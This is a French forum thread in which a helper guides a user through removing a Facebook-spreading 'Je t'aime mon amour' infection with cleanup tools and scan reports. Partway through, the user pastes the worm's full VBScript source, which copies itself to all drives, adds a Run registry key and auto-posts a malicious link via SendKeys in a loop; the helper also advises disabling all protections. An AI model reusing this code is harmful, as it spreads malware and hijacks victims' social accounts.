Virus sur facebook "Je t'aime mon amour"

Question

Bonjour, 

J'ai cliqué sur un lien facebook "je t'aime mon amour" qu'un ami a posté sur son mur, et j'ai bêtement ouvert et téléchargé le fichier qui était sous format .zip . Et depuis toute les 20 minutes ça publie sur mon mur "Je t'aime mon amour <3" avec le lien zip. Et je ne peux rien faire, ça ouvre une page firefox et ça publie avec mon nom. 
Comment faire pour arrêter ce virus ?

PS: Quelqu'un est dans la même situation que moi ici : http://www.commentcamarche.net/forum/affich-26290012-virus-je-t-aime-mon-amour-sur-facebook mais on m'a conseillé de reposer la question. 

Merci d'avance, bonne journée.

g3n-h@ckm@n · Answer

salut 

Attention !!! : cet outil peut etre détecté à tort comme virus
Attention !!! : cet outil est puissant suivre scrupuleusement les instructions ci-dessous

tous les processus "non vitaux de windows" vont être coupés , enregistre ton travail.

Désactive toutes tes protections si possible , antivirus , sandbox , pare-feux , etc....

telecharge et enregistre Pre_Scan sur ton bureau :

https://forums-fec.be/gen-hackman/Pre_Scan.exe

si le lien ne fonctionne pas :

http://www.archive-host.com

Avertissement :Il y aura une extinction du bureau pendant le scan --> pas de panique.

une fois telechargé lance-le , laisse faire le scan jusqu'à l'apparition de "Pre_scan_la_date_et_l'heure.txt" sur le bureau.

si l'outil est relancé plusieurs fois , il te proposera un menu et qu'aucune option n'est demandée, lance l'option "Kill"

si l'outil est bloqué par l'infection utilise cette version avec extension .pif :

https://forums-fec.be/gen-hackman/Pre_Scan.pif

si l'outil detecte un proxy et que tu n'en as pas installé clique sur "supprimer le proxy"

Il se peut qu'une multitude de fenêtres noires clignotent , laisse-le travailler

Poste Pre_Scan_la_date_et_l'heure.txt qui apparaitra sur le bureau en fin de scan

Il est possible que l'outil fasse redemarrer ton pc , laisse-le faire

NE LE POSTE PAS SUR LE FORUM !!! (il est trop long)

Heberge le rapport sur https://forums-fec.be/upload puis donne le lien obtenu en echange sur le forum où tu te fais aider
  
  
¤¤¤¤¤¤¤¤¤¤ Pre_Scan_Concept ¤¤¤¤¤¤¤¤¤¤

Floflo · Answer

Ok merci je vais ça et je vous poste tout ça.

g3n-h@ckm@n · Answer

à te lire :)

Floflo · Answer

Bonjour, 
le scan n'a pas marché. Non seulement il était très long 2/3h mais au bout d'un moment il m'a dit qu'il allait devoir reboot mon pc, j'ai donc mis OK mais lorsqu'il s'est rallumé, le scan n'a pas continué

g3n-h@ckm@n · Answer

relance-le manuellement c'est surement à cause de l antivirus qui l'a bloqué au redemarrage

Floflo · Answer

Re bonjour, 

Voici le scan::	https://forums-fec.be/upload/www/?a=d&i=6073703376

g3n-h@ckm@n · Answer

Avast , norton , va falloir choisir !!!  

je sais pas ce que tu as fait ce rapport est incomprehensible
  
¤¤¤¤¤¤¤¤¤¤ Pre_Scan_Concept ¤¤¤¤¤¤¤¤¤¤

g3n-h@ckm@n · Answer

bon tu vires lequel d antivirus que je te donne l outil adéquat ?

g3n-h@ckm@n · Answer

utilise ceci :

https://www-secure.symantec.com/norton-support/jsp/help-solutions.jsp?docid=kb20080710133834EN_EndUserProfile_fr_fr&product=home&pvid=f-home&version=1&lg=en&ct=us

g3n-h@ckm@n · Answer

ok relance pre_scan clique sur diag et poste le rapport via un lien

Pre_Diag_etc.......txt qui apparaitra sur ton bureau

Floflo · Answer

https://forums-fec.be/upload/www/?a=d&i=3705782919 voilà le lien du diag

g3n-h@ckm@n · Answer

et ouais tu avais lancé le premier scan dans la sandbox d'avast en plus....  

 desactive les sandbox d'avast , et desactive tous les agents "en permanence" pour le moment , supprime les rapports de pre_scan qui sont sur le bureau ou dans c:\ , puis relance l'option kill  
   
¤¤¤¤¤¤¤¤¤¤ Pre_Scan_Concept ¤¤¤¤¤¤¤¤¤¤

Floflo · Answer

Voilà le scan normalement c'est bon cette fois ^^ 
https://forums-fec.be/upload/www/?a=d&i=9294307366

g3n-h@ckm@n · Answer

ah !!! y'a un mieux !!! ^^

le truc facebook t'embetera plus

=====

relance un diag maintenant

Floflo · Answer

Voilà le diag https://forums-fec.be/upload/www/?a=d&i=2743001689

g3n-h@ckm@n · Answer

Télécharge et enregistre ADWcleaner sur ton bureau :

ADWCleaner (Merci à Xplode)

Lance le,

(Pour vista et seven => clic droit "executer en tant qu'administrateur")

clique sur suppression et poste son rapport.

Floflo · Answer

# AdwCleaner v2.005 - Rapport créé le 21/10/2012 à 20:05:27
# Mis à jour le 14/10/2012 par Xplode
# Système d'exploitation : Windows 7 Home Premium Service Pack 1 (64 bits)
# Nom d'utilisateur : Florian - FLORIAN-HP
# Mode de démarrage : Normal
# Exécuté depuis : C:\Users\Florian\Desktop\AdwCleaner.exe
# Option [Suppression]


***** [Services] *****


***** [Fichiers / Dossiers] *****


***** [Registre] *****


***** [Navigateurs] *****

-\ Internet Explorer v9.0.8112.16421

[OK] Le registre ne contient aucune entrée illégitime.

-\ Mozilla Firefox v15.0 (fr)

Nom du profil : default 
Fichier : C:\Users\Florian\AppData\Roaming\Mozilla\Firefox\Profiles\cigr0tgo.default\prefs.js

[OK] Le fichier ne contient aucune entrée illégitime.

-\ Google Chrome v [Impossible d'obtenir la version]

Fichier : C:\Users\Florian\AppData\Local\Google\Chrome\User Data\Default\Preferences

Supprimée [l.35] : keyword = "search.iminent.com",
Supprimée [l.38] : search_url = "hxxp://search.iminent.com/?appId=77F9A03D-21D0-4491-8745-9A85B2B2DA3F&ref=toolbox&q={searchTerms}",

*************************

AdwCleaner[S3].txt - [1137 octets] - [21/10/2012 20:05:27]

########## EOF - C:\AdwCleaner[S3].txt - [1197 octets] ##########

g3n-h@ckm@n · Answer

je peux savoir ce que tu as fait avec les autres rapports ?

g3n-h@ckm@n · Answer

ils sont où le S2 et le S1 ?

Floflo · Answer

Avec j'ai eu ça:
On error resume next '11/07/2012 by N@ks
Set C = CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName)
Set Nn1 = CreateObject("WScript.Shell")
Set Nn2 = CreateObject("Scripting.FileSystemObject")
Set Nn3 = Nn2.GetSpecialFolder(1)
Set Drives=Nn2.drives
Bm = Nn1.SpecialFolders("Startup")
Do
For Each Drive in Drives
If drive.isready then
Nn2.CopyFile ""&WScript.ScriptFullName&"" , ""&drive&"\Je_t'aime.vbs"
end If
Next
C.Copy(Nn3&"\Knucker.C.vbs")
If Nn2.FileExists(Nn3&"\Knucker.C.vbs") Then
Nn1.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Pdll", ""&Nn3&"\Knucker.C.vbs"
Else
C.Copy(Bm&"\Wsserv.vbs")
End If
wscript.sleep 10000
Nn1.run "http://www.facebook.com/sharer.php?u=http://kamasms.fr/vi.html"
wscript.sleep 7000
Nn1.SendKeys ("{tab}")
Nn1.SendKeys ("{tab}")
Nn1.SendKeys ("{tab}")
Nn1.SendKeys ("Je t'aime mon amoooouuuurrr <3<3<3 :) !")
wscript.sleep 121
Nn1.SendKeys ("{tab}")
Nn1.SendKeys ("{enter}")
wscript.sleep 121
Nn1.SendKeys ("^{F4}")
wscript.sleep 1000*60*15
Loop

g3n-h@ckm@n · Answer

tu fais quoi avec le pc pendant la desinfefction ? du streaming ? tu installes n importe quoi ?

g3n-h@ckm@n · Answer

suppprime je t'aime et END

g3n-h@ckm@n · Answer

tu peux le supprimer manuellement celui dans D:\ ?

g3n-h@ckm@n · Answer

selectionne ce texte : 

File|Fold:: 
C:\Je_t'aime.vbs 
D:\je_t'aime.vbs  

Relance Pre_scan puis choisis l'option "Script" 

une page va s'ouvrir 

logiquement le texte que tu as sélectionné s'y trouve déjà , donc tu fermes et le programme va travailler. 

sinon colle-le (clic droit/coller ou ctrl+V) dans la page vierge. 

puis onglet fichier => enregistrer (pas enregistrer sous...) , puis ferme le texte 

des fenetres noires risquent de clignoter , c'est normal , c'est le programme qui travaille  

poste Pre_Script.txt qui apparaitra sur le bureau en fin de travail 
  
¤¤¤¤¤¤¤¤¤¤ Pre_Scan_Concept ¤¤¤¤¤¤¤¤¤¤

Floflo · Answer

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Pre_Script | 2.1021 ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

Florian : Windows 7 Home Premium (64 bits)

Switchs : http://gen-hackman.forum-pro.fr/t89-les-switchs

New restorepoint created


Script : 22:29:42

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

File Quarantined and Deleted Successfully :  |A| - C:\Je_t'aime.vbs 
File Quarantined and Deleted Successfully :  |A| - D:\je_t'aime.vbs 


Fin : 22:29:43

¤¤¤¤¤¤¤¤¤¤ ( EOF ) ¤¤¤¤¤¤¤¤¤¤

g3n-h@ckm@n · Answer

ok redemarre le pc et vois s ils sont revenus

Floflo · Answer

Ils ne sont pas revenus

g3n-h@ckm@n · Answer

bien refais un diag avec pre_scan

Floflo · Answer

Je vais me coucher, je ferai ça demain. 
En tout cas vraiment merci pour toute l'aide que tu m'as apporté !

g3n-h@ckm@n · Answer

ok demain on aura terminé

Floflo · Answer

Salut !
Voilà le diag https://forums-fec.be/upload/www/?a=d&i=8631732996

g3n-h@ckm@n · Answer

desinstalle adobe reader 9

t'es retourné sur facebook entre temps ?

g3n-h@ckm@n · Answer

relance pre_scan clique sur regedit

deplie avec les petits "+"

HKEY_LOCAL_MACHINE
\Software
\Microsoft
\Software

clic droit sur celui en gras et choisis exporter => du nom que tu veux , sur le bureau

ferme le registre

ensuite clique droit sur la clé ainsi créée puis selectionne "modifier"

colle le contenu ici 

ensuite tu peux la fermer ( la clé ^^ ) et la supprimer
 
 ===========================

desinstalle tout Java

============================

Attention !!! pense à re-désactiver tes protections

Clique sur ce lien : https://www.cjoint.com/?BJwvH4QYosS

Selectionne tout le texte qui s'y trouve CTRL+A puis CTRL+C ou clic droit/copier

Relance Pre_scan puis choisis l'option "Script"

une page va s'ouvrir

logiquement le texte que tu as sélectionné s'y trouve déjà , donc tu fermes et le programme va travailler.

sinon colle-le (clic droit/coller ou ctrl+V) dans la page vierge.

puis onglet fichier => enregistrer (pas enregistrer sous...) , puis ferme le texte

des fenetres noires risquent de clignoter , c'est normal , c'est le programme qui travaille 

poste Pre_Script.txt qui apparaitra sur le bureau en fin de travail

Virus sur facebook "Je t'aime mon amour"

33 réponses

Votre réponse

Discussions similaires

Newsletters